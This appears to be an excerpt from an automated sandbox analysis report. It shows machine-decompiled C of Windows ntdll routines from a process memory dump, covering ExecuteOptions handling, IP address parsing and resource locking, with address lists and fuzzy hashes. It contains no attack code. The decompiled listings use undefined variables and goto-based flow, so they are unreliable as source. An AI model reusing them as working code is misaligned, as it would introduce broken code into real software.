                                                                                        					_v544 = 0x214;
                                                                                        					E00A7DFC0( &_v540, 0, 0x214);
                                                                                        					_t75 = _t74 + 0x20;
                                                                                        					_t46 =  *0xb54218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                                                        					__eflags = _t46;
                                                                                        					if(_t46 == 0) {
                                                                                        						goto L1;
                                                                                        					}
                                                                                        					_t47 = _v544;
                                                                                        					__eflags = _t47;
                                                                                        					if(_t47 == 0) {
                                                                                        						goto L1;
                                                                                        					}
                                                                                        					__eflags = _t47 - 0x214;
                                                                                        					if(_t47 >= 0x214) {
                                                                                        						goto L1;
                                                                                        					}
                                                                                        					_push(_t62);
                                                                                        					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                                                        					E00AC3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                                                        					_t52 = E00A80D27( &_v540, L"Execute=1");
                                                                                        					_t76 = _t75 + 0x1c;
                                                                                        					_push(_t62);
                                                                                        					__eflags = _t52;
                                                                                        					if(_t52 == 0) {
                                                                                        						E00AC3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                                                        						_t71 =  &_v540;
                                                                                        						_t56 = _t73 + _v544 - 0x218;
                                                                                        						_t77 = _t76 + 0x14;
                                                                                        						_v552 = _t56;
                                                                                        						__eflags = _t71 - _t56;
                                                                                        						if(_t71 >= _t56) {
                                                                                        							goto L1;
                                                                                        						} else {
                                                                                        							goto L10;
                                                                                        						}
                                                                                        						while(1) {
                                                                                        							L10:
                                                                                        							_t62 = E00A88375(_t71, 0x20);
                                                                                        							_pop(_t69);
                                                                                        							__eflags = _t62;
                                                                                        							if(__eflags != 0) {
                                                                                        								__eflags = 0;
                                                                                        								 *_t62 = 0;
                                                                                        							}
                                                                                        							E00AC3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                                                        							_t77 = _t77 + 0x10;
                                                                                        							E00AEE8DB(_t69, _t70, __eflags, _t72, _t71);
                                                                                        							__eflags = _t62;
                                                                                        							if(_t62 == 0) {
                                                                                        								goto L1;
                                                                                        							}
                                                                                        							_t31 = _t62 + 2; // 0x2
                                                                                        							_t71 = _t31;
                                                                                        							__eflags = _t71 - _v552;
                                                                                        							if(_t71 >= _v552) {
                                                                                        								goto L1;
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                                                        					_push(3);
                                                                                        					_push(0x55);
                                                                                        					E00AC3F92();
                                                                                        					_t38 = 1;
                                                                                        					L2:
                                                                                        					return E00A7E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                                                        				}
                                                                                        				L1:
                                                                                        				_t38 = 0;
                                                                                        				goto L2;
                                                                                        			}

                                                                                        APIs
                                                                                        • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00AC3F12
                                                                                        Strings
                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00AC3EC4
                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00ACE2FB
                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 00ACE345
                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00AC3F4A
                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00AC3F75
                                                                                        • ExecuteOptions, xrefs: 00AC3F04
                                                                                        • Execute=1, xrefs: 00AC3F5E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID: BaseDataModuleQuery
                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                        • API String ID: 3901378454-484625025
                                                                                        • Opcode ID: 4dd6d300e07433dd5268038af5517cea92cce1399145baaddfebbfd62f8cee95
                                                                                        • Instruction ID: a8651ef1699448fbfff9239e1310a2b11b3e1fff0a88065a6d8e25aa8ed3b3ee
                                                                                        • Opcode Fuzzy Hash: 4dd6d300e07433dd5268038af5517cea92cce1399145baaddfebbfd62f8cee95
                                                                                        • Instruction Fuzzy Hash: A9419572A4031C7ADF20DB94DD86FDF73BCAB15700F0085A9B509A71C1EB70AB458BA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00AB0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                                                        				signed int _v8;
                                                                                        				signed int _v12;
                                                                                        				signed int _v16;
                                                                                        				signed int _v20;
                                                                                        				signed int _v24;
                                                                                        				signed int _v28;
                                                                                        				signed int _v32;
                                                                                        				void* _t108;
                                                                                        				void* _t116;
                                                                                        				char _t120;
                                                                                        				short _t121;
                                                                                        				void* _t128;
                                                                                        				intOrPtr* _t130;
                                                                                        				char _t132;
                                                                                        				short _t133;
                                                                                        				intOrPtr _t141;
                                                                                        				signed int _t156;
                                                                                        				signed int _t174;
                                                                                        				intOrPtr _t177;
                                                                                        				intOrPtr* _t179;
                                                                                        				intOrPtr _t180;
                                                                                        				void* _t183;
                                                                                        
                                                                                        				_t179 = _a4;
                                                                                        				_t141 =  *_t179;
                                                                                        				_v16 = 0;
                                                                                        				_v28 = 0;
                                                                                        				_v8 = 0;
                                                                                        				_v24 = 0;
                                                                                        				_v12 = 0;
                                                                                        				_v32 = 0;
                                                                                        				_v20 = 0;
                                                                                        				if(_t141 == 0) {
                                                                                        					L41:
                                                                                        					 *_a8 = _t179;
                                                                                        					_t180 = _v24;
                                                                                        					if(_t180 != 0) {
                                                                                        						if(_t180 != 3) {
                                                                                        							goto L6;
                                                                                        						}
                                                                                        						_v8 = _v8 + 1;
                                                                                        					}
                                                                                        					_t174 = _v32;
                                                                                        					if(_t174 == 0) {
                                                                                        						if(_v8 == 7) {
                                                                                        							goto L43;
                                                                                        						}
                                                                                        						goto L6;
                                                                                        					}
                                                                                        					L43:
                                                                                        					if(_v16 != 1) {
                                                                                        						if(_v16 != 2) {
                                                                                        							goto L6;
                                                                                        						}
                                                                                        						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                        						L47:
                                                                                        						if(_t174 != 0) {
                                                                                        							E00A88980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                                                        							_t116 = 8;
                                                                                        							E00A7DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                                                        						}
                                                                                        						return 0;
                                                                                        					}
                                                                                        					if(_t180 != 0) {
                                                                                        						if(_v12 > 3) {
                                                                                        							goto L6;
                                                                                        						}
                                                                                        						_t120 = E00AB0CFA(_v28, 0, 0xa);
                                                                                        						_t183 = _t183 + 0xc;
                                                                                        						if(_t120 > 0xff) {
                                                                                        							goto L6;
                                                                                        						}
                                                                                        						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                                                        						goto L47;
                                                                                        					}
                                                                                        					if(_v12 > 4) {
                                                                                        						goto L6;
                                                                                        					}
                                                                                        					_t121 = E00AB0CFA(_v28, _t180, 0x10);
                                                                                        					_t183 = _t183 + 0xc;
                                                                                        					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                                                        					goto L47;
                                                                                        				} else {
                                                                                        					while(1) {
                                                                                        						_t123 = _v16;
                                                                                        						if(_t123 == 0) {
                                                                                        							goto L7;
                                                                                        						}
                                                                                        						_t108 = _t123 - 1;
                                                                                        						if(_t108 != 0) {
                                                                                        							goto L1;
                                                                                        						}
                                                                                        						_t178 = _t141;
                                                                                        						if(E00AB06BA(_t108, _t141) == 0 || _t135 == 0) {
                                                                                        							if(E00AB06BA(_t135, _t178) == 0 || E00AB0A5B(_t136, _t178) == 0) {
                                                                                        								if(_t141 != 0x3a) {
                                                                                        									if(_t141 == 0x2e) {
                                                                                        										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                                                        											goto L41;
                                                                                        										} else {
                                                                                        											_v24 = _v24 + 1;
                                                                                        											L27:
                                                                                        											_v16 = _v16 & 0x00000000;
                                                                                        											L28:
                                                                                        											if(_v28 == 0) {
                                                                                        												goto L20;
                                                                                        											}
                                                                                        											_t177 = _v24;
                                                                                        											if(_t177 != 0) {
                                                                                        												if(_v12 > 3) {
                                                                                        													L6:
                                                                                        													return 0xc000000d;
                                                                                        												}
                                                                                        												_t132 = E00AB0CFA(_v28, 0, 0xa);
                                                                                        												_t183 = _t183 + 0xc;
                                                                                        												if(_t132 > 0xff) {
                                                                                        													goto L6;
                                                                                        												}
                                                                                        												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                                                        												goto L20;
                                                                                        											}
                                                                                        											if(_v12 > 4) {
                                                                                        												goto L6;
                                                                                        											}
                                                                                        											_t133 = E00AB0CFA(_v28, 0, 0x10);
                                                                                        											_t183 = _t183 + 0xc;
                                                                                        											_v20 = _v20 + 1;
                                                                                        											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                                                        											goto L20;
                                                                                        										}
                                                                                        									}
                                                                                        									goto L41;
                                                                                        								}
                                                                                        								if(_v24 > 0 || _v8 > 6) {
                                                                                        									goto L41;
                                                                                        								} else {
                                                                                        									_t130 = _t179 + 1;
                                                                                        									if( *_t130 == _t141) {
                                                                                        										if(_v32 != 0) {
                                                                                        											goto L41;
                                                                                        										}
                                                                                        										_v32 = _v8 + 1;
                                                                                        										_t156 = 2;
                                                                                        										_v8 = _v8 + _t156;
                                                                                        										L34:
                                                                                        										_t179 = _t130;
                                                                                        										_v16 = _t156;
                                                                                        										goto L28;
                                                                                        									}
                                                                                        									_v8 = _v8 + 1;
                                                                                        									goto L27;
                                                                                        								}
                                                                                        							} else {
                                                                                        								_v12 = _v12 + 1;
                                                                                        								if(_v24 > 0) {
                                                                                        									goto L41;
                                                                                        								}
                                                                                        								_a7 = 1;
                                                                                        								goto L20;
                                                                                        							}
                                                                                        						} else {
                                                                                        							_v12 = _v12 + 1;
                                                                                        							L20:
                                                                                        							_t179 = _t179 + 1;
                                                                                        							_t141 =  *_t179;
                                                                                        							if(_t141 == 0) {
                                                                                        								goto L41;
                                                                                        							}
                                                                                        							continue;
                                                                                        						}
                                                                                        						L7:
                                                                                        						if(_t141 == 0x3a) {
                                                                                        							if(_v24 > 0 || _v8 > 0) {
                                                                                        								goto L41;
                                                                                        							} else {
                                                                                        								_t130 = _t179 + 1;
                                                                                        								if( *_t130 != _t141) {
                                                                                        									goto L41;
                                                                                        								}
                                                                                        								_v20 = _v20 + 1;
                                                                                        								_t156 = 2;
                                                                                        								_v32 = 1;
                                                                                        								_v8 = _t156;
                                                                                        								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                        								goto L34;
                                                                                        							}
                                                                                        						}
                                                                                        						L8:
                                                                                        						if(_v8 > 7) {
                                                                                        							goto L41;
                                                                                        						}
                                                                                        						_t142 = _t141;
                                                                                        						if(E00AB06BA(_t123, _t141) == 0 || _t124 == 0) {
                                                                                        							if(E00AB06BA(_t124, _t142) == 0 || E00AB0A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                                                        								goto L41;
                                                                                        							} else {
                                                                                        								_t128 = 1;
                                                                                        								_a7 = 1;
                                                                                        								_v28 = _t179;
                                                                                        								_v16 = 1;
                                                                                        								_v12 = 1;
                                                                                        								L39:
                                                                                        								if(_v16 == _t128) {
                                                                                        									goto L20;
                                                                                        								}
                                                                                        								goto L28;
                                                                                        							}
                                                                                        						} else {
                                                                                        							_a7 = 0;
                                                                                        							_v28 = _t179;
                                                                                        							_v16 = 1;
                                                                                        							_v12 = 1;
                                                                                        							goto L20;
                                                                                        						}
                                                                                        					}
                                                                                        				}
                                                                                        				L1:
                                                                                        				_t123 = _t108 == 1;
                                                                                        				if(_t108 == 1) {
                                                                                        					goto L8;
                                                                                        				}
                                                                                        				_t128 = 1;
                                                                                        				goto L39;
                                                                                        			}
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ab0b56
                                                                                        0x00ab0b62
                                                                                        0x00ab0b7c
                                                                                        0x00ab0bac
                                                                                        0x00ab0a0f
                                                                                        0x00adeaaa
                                                                                        0x00000000
                                                                                        0x00adeac4
                                                                                        0x00adeac4
                                                                                        0x00ab0bd0
                                                                                        0x00ab0bd0
                                                                                        0x00ab0bd4
                                                                                        0x00ab0bd9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ab0bdb
                                                                                        0x00ab0be0
                                                                                        0x00adeb0e
                                                                                        0x00ab0a1a
                                                                                        0x00000000
                                                                                        0x00ab0a1a
                                                                                        0x00adeb1a
                                                                                        0x00adeb1f
                                                                                        0x00adeb27
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00adeb36
                                                                                        0x00000000
                                                                                        0x00adeb36
                                                                                        0x00ab0bea
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ab0bf6
                                                                                        0x00ab0c00
                                                                                        0x00ab0c03
                                                                                        0x00ab0c0b
                                                                                        0x00000000
                                                                                        0x00ab0c0b
                                                                                        0x00adeaaa
                                                                                        0x00000000
                                                                                        0x00ab0a15
                                                                                        0x00ab0bb6
                                                                                        0x00000000
                                                                                        0x00ab0bc6
                                                                                        0x00ab0bc6
                                                                                        0x00ab0bcb
                                                                                        0x00ab0c15
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ab0c1d
                                                                                        0x00ab0c20
                                                                                        0x00ab0c21
                                                                                        0x00ab0c24
                                                                                        0x00ab0c24
                                                                                        0x00ab0c26
                                                                                        0x00000000
                                                                                        0x00ab0c26
                                                                                        0x00ab0bcd
                                                                                        0x00000000
                                                                                        0x00ab0bcd
                                                                                        0x00ab0b89
                                                                                        0x00ab0b89
                                                                                        0x00ab0b90
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ab0b96
                                                                                        0x00000000
                                                                                        0x00ab0b96
                                                                                        0x00ab0a04
                                                                                        0x00ab0a04
                                                                                        0x00ab0b9a
                                                                                        0x00ab0b9a
                                                                                        0x00ab0b9b
                                                                                        0x00ab0b9f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ab0ba5
                                                                                        0x00ab0ac7
                                                                                        0x00ab0aca
                                                                                        0x00adeacf
                                                                                        0x00000000
                                                                                        0x00adeade
                                                                                        0x00adeade
                                                                                        0x00adeae3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00adeaf3
                                                                                        0x00adeaf6
                                                                                        0x00adeaf7
                                                                                        0x00adeafe
                                                                                        0x00adeb01
                                                                                        0x00000000
                                                                                        0x00adeb01
                                                                                        0x00adeacf
                                                                                        0x00ab0ad0
                                                                                        0x00ab0ad4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ab0ada
                                                                                        0x00ab0ae6
                                                                                        0x00ab0c34
                                                                                        0x00000000
                                                                                        0x00ab0c47
                                                                                        0x00ab0c49
                                                                                        0x00ab0c4a
                                                                                        0x00ab0c4e
                                                                                        0x00ab0c51
                                                                                        0x00ab0c54
                                                                                        0x00ab0c57
                                                                                        0x00ab0c5a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ab0c60
                                                                                        0x00ab0afb
                                                                                        0x00ab0afe
                                                                                        0x00ab0b02
                                                                                        0x00ab0b05
                                                                                        0x00ab0b08
                                                                                        0x00000000
                                                                                        0x00ab0b08
                                                                                        0x00ab0ae6
                                                                                        0x00ab0b44
                                                                                        0x00ab09f8
                                                                                        0x00ab09f8
                                                                                        0x00ab09f9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00adeaa0
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID: __fassign
                                                                                        • String ID: .$:$:
                                                                                        • API String ID: 3965848254-2308638275
                                                                                        • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                        • Instruction ID: c8c82aeadabb0ebd0fed61d8f7a7588cdaaf12bc93c51caf5d738e2111e35faa
                                                                                        • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                        • Instruction Fuzzy Hash: 09A17C7190030AEFCB24DF64C855AFFBBBCAF16305F2485AAD852A7283D7349A41DB51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 49%
                                                                                        			E00AB0554(signed int _a4, char _a8) {
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				signed int* _t49;
                                                                                        				signed int _t51;
                                                                                        				signed int _t56;
                                                                                        				signed int _t58;
                                                                                        				signed int _t61;
                                                                                        				signed int _t63;
                                                                                        				void* _t66;
                                                                                        				intOrPtr _t67;
                                                                                        				signed int _t70;
                                                                                        				void* _t75;
                                                                                        				signed int _t81;
                                                                                        				signed int _t84;
                                                                                        				void* _t86;
                                                                                        				signed int _t93;
                                                                                        				signed int _t96;
                                                                                        				intOrPtr _t105;
                                                                                        				signed int _t107;
                                                                                        				void* _t110;
                                                                                        				signed int _t115;
                                                                                        				signed int* _t119;
                                                                                        				void* _t125;
                                                                                        				void* _t126;
                                                                                        				signed int _t128;
                                                                                        				signed int _t130;
                                                                                        				signed int _t138;
                                                                                        				signed int _t144;
                                                                                        				void* _t158;
                                                                                        				void* _t159;
                                                                                        				void* _t160;
                                                                                        
                                                                                        				_t96 = _a4;
                                                                                        				_t115 =  *(_t96 + 0x28);
                                                                                        				_push(_t138);
                                                                                        				if(_t115 < 0) {
                                                                                        					_t105 =  *[fs:0x18];
                                                                                        					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                                                        					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                                                        						goto L6;
                                                                                        					} else {
                                                                                        						__eflags = _t115 | 0xffffffff;
                                                                                        						asm("lock xadd [eax], edx");
                                                                                        						return 1;
                                                                                        					}
                                                                                        				} else {
                                                                                        					L6:
                                                                                        					_push(_t128);
                                                                                        					while(1) {
                                                                                        						L7:
                                                                                        						__eflags = _t115;
                                                                                        						if(_t115 >= 0) {
                                                                                        							break;
                                                                                        						}
                                                                                        						__eflags = _a8;
                                                                                        						if(_a8 == 0) {
                                                                                        							__eflags = 0;
                                                                                        							return 0;
                                                                                        						} else {
                                                                                        							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                        							_t49 = _t96 + 0x1c;
                                                                                        							_t106 = 1;
                                                                                        							asm("lock xadd [edx], ecx");
                                                                                        							_t115 =  *(_t96 + 0x28);
                                                                                        							__eflags = _t115;
                                                                                        							if(_t115 < 0) {
                                                                                        								L23:
                                                                                        								_t130 = 0;
                                                                                        								__eflags = 0;
                                                                                        								while(1) {
                                                                                        									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                                                        									asm("sbb esi, esi");
                                                                                        									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00b501c0;
                                                                                        									_push(_t144);
                                                                                        									_push(0);
                                                                                        									_t51 = E00A6F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                                                        									__eflags = _t51 - 0x102;
                                                                                        									if(_t51 != 0x102) {
                                                                                        										break;
                                                                                        									}
                                                                                        									_t106 =  *(_t144 + 4);
                                                                                        									_t126 =  *_t144;
                                                                                        									_t86 = E00AB4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                                                        									_push(_t126);
                                                                                        									_push(_t86);
                                                                                        									E00AC3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                                                        									E00AC3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                        									_t130 = _t130 + 1;
                                                                                        									_t160 = _t158 + 0x28;
                                                                                        									__eflags = _t130 - 2;
                                                                                        									if(__eflags > 0) {
                                                                                        										E00AF217A(_t106, __eflags, _t96);
                                                                                        									}
                                                                                        									_push("RTL: Re-Waiting\n");
                                                                                        									_push(0);
                                                                                        									_push(0x65);
                                                                                        									E00AC3F92();
                                                                                        									_t158 = _t160 + 0xc;
                                                                                        								}
                                                                                        								__eflags = _t51;
                                                                                        								if(__eflags < 0) {
                                                                                        									_push(_t51);
                                                                                        									E00AB3915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                                                        									asm("int3");
                                                                                        									while(1) {
                                                                                        										L32:
                                                                                        										__eflags = _a8;
                                                                                        										if(_a8 == 0) {
                                                                                        											break;
                                                                                        										}
                                                                                        										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                        										_t119 = _t96 + 0x24;
                                                                                        										_t107 = 1;
                                                                                        										asm("lock xadd [eax], ecx");
                                                                                        										_t56 =  *(_t96 + 0x28);
                                                                                        										_a4 = _t56;
                                                                                        										__eflags = _t56;
                                                                                        										if(_t56 != 0) {
                                                                                        											L40:
                                                                                        											_t128 = 0;
                                                                                        											__eflags = 0;
                                                                                        											while(1) {
                                                                                        												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                                                        												asm("sbb esi, esi");
                                                                                        												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00b501c0;
                                                                                        												_push(_t138);
                                                                                        												_push(0);
                                                                                        												_t58 = E00A6F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                                                        												__eflags = _t58 - 0x102;
                                                                                        												if(_t58 != 0x102) {
                                                                                        													break;
                                                                                        												}
                                                                                        												_t107 =  *(_t138 + 4);
                                                                                        												_t125 =  *_t138;
                                                                                        												_t75 = E00AB4FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                                                        												_push(_t125);
                                                                                        												_push(_t75);
                                                                                        												E00AC3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                                                        												E00AC3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                        												_t128 = _t128 + 1;
                                                                                        												_t159 = _t158 + 0x28;
                                                                                        												__eflags = _t128 - 2;
                                                                                        												if(__eflags > 0) {
                                                                                        													E00AF217A(_t107, __eflags, _t96);
                                                                                        												}
                                                                                        												_push("RTL: Re-Waiting\n");
                                                                                        												_push(0);
                                                                                        												_push(0x65);
                                                                                        												E00AC3F92();
                                                                                        												_t158 = _t159 + 0xc;
                                                                                        											}
                                                                                        											__eflags = _t58;
                                                                                        											if(__eflags < 0) {
                                                                                        												_push(_t58);
                                                                                        												E00AB3915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                                                        												asm("int3");
                                                                                        												_t61 =  *_t107;
                                                                                        												 *_t107 = 0;
                                                                                        												__eflags = _t61;
                                                                                        												if(_t61 == 0) {
                                                                                        													L1:
                                                                                        													_t63 = E00A95384(_t138 + 0x24);
                                                                                        													if(_t63 != 0) {
                                                                                        														goto L52;
                                                                                        													} else {
                                                                                        														goto L2;
                                                                                        													}
                                                                                        												} else {
                                                                                        													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                                                        													_push( &_a4);
                                                                                        													_push(_t61);
                                                                                        													_t70 = E00A6F970( *((intOrPtr*)(_t138 + 0x18)));
                                                                                        													__eflags = _t70;
                                                                                        													if(__eflags >= 0) {
                                                                                        														goto L1;
                                                                                        													} else {
                                                                                        														_push(_t70);
                                                                                        														E00AB3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                                                        														L52:
                                                                                        														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                        														_push( &_a4);
                                                                                        														_push(1);
                                                                                        														_t63 = E00A6F970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                        														__eflags = _t63;
                                                                                        														if(__eflags >= 0) {
                                                                                        															L2:
                                                                                        															return _t63;
                                                                                        														} else {
                                                                                        															_push(_t63);
                                                                                        															E00AB3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                                                        															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                        															_push( &_a4);
                                                                                        															_push(1);
                                                                                        															_t63 = E00A6F970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                        															__eflags = _t63;
                                                                                        															if(__eflags >= 0) {
                                                                                        																goto L2;
                                                                                        															} else {
                                                                                        																_push(_t63);
                                                                                        																_t66 = E00AB3915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                                                        																asm("int3");
                                                                                        																while(1) {
                                                                                        																	_t110 = _t66;
                                                                                        																	__eflags = _t66 - 1;
                                                                                        																	if(_t66 != 1) {
                                                                                        																		break;
                                                                                        																	}
                                                                                        																	_t128 = _t128 | 0xffffffff;
                                                                                        																	_t66 = _t110;
                                                                                        																	asm("lock cmpxchg [ebx], edi");
                                                                                        																	__eflags = _t66 - _t110;
                                                                                        																	if(_t66 != _t110) {
                                                                                        																		continue;
                                                                                        																	} else {
                                                                                        																		_t67 =  *[fs:0x18];
                                                                                        																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                                                        																		return _t67;
                                                                                        																	}
                                                                                        																	goto L58;
                                                                                        																}
                                                                                        																E00A95329(_t110, _t138);
                                                                                        																return E00A953A5(_t138, 1);
                                                                                        															}
                                                                                        														}
                                                                                        													}
                                                                                        												}
                                                                                        											} else {
                                                                                        												_t56 =  *(_t96 + 0x28);
                                                                                        												goto L3;
                                                                                        											}
                                                                                        										} else {
                                                                                        											_t107 =  *_t119;
                                                                                        											__eflags = _t107;
                                                                                        											if(__eflags > 0) {
                                                                                        												while(1) {
                                                                                        													_t81 = _t107;
                                                                                        													asm("lock cmpxchg [edi], esi");
                                                                                        													__eflags = _t81 - _t107;
                                                                                        													if(_t81 == _t107) {
                                                                                        														break;
                                                                                        													}
                                                                                        													_t107 = _t81;
                                                                                        													__eflags = _t81;
                                                                                        													if(_t81 > 0) {
                                                                                        														continue;
                                                                                        													}
                                                                                        													break;
                                                                                        												}
                                                                                        												_t56 = _a4;
                                                                                        												__eflags = _t107;
                                                                                        											}
                                                                                        											if(__eflags != 0) {
                                                                                        												while(1) {
                                                                                        													L3:
                                                                                        													__eflags = _t56;
                                                                                        													if(_t56 != 0) {
                                                                                        														goto L32;
                                                                                        													}
                                                                                        													_t107 = _t107 | 0xffffffff;
                                                                                        													_t56 = 0;
                                                                                        													asm("lock cmpxchg [edx], ecx");
                                                                                        													__eflags = 0;
                                                                                        													if(0 != 0) {
                                                                                        														continue;
                                                                                        													} else {
                                                                                        														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                        														return 1;
                                                                                        													}
                                                                                        													goto L58;
                                                                                        												}
                                                                                        												continue;
                                                                                        											} else {
                                                                                        												goto L40;
                                                                                        											}
                                                                                        										}
                                                                                        										goto L58;
                                                                                        									}
                                                                                        									__eflags = 0;
                                                                                        									return 0;
                                                                                        								} else {
                                                                                        									_t115 =  *(_t96 + 0x28);
                                                                                        									continue;
                                                                                        								}
                                                                                        							} else {
                                                                                        								_t106 =  *_t49;
                                                                                        								__eflags = _t106;
                                                                                        								if(__eflags > 0) {
                                                                                        									while(1) {
                                                                                        										_t93 = _t106;
                                                                                        										asm("lock cmpxchg [edi], esi");
                                                                                        										__eflags = _t93 - _t106;
                                                                                        										if(_t93 == _t106) {
                                                                                        											break;
                                                                                        										}
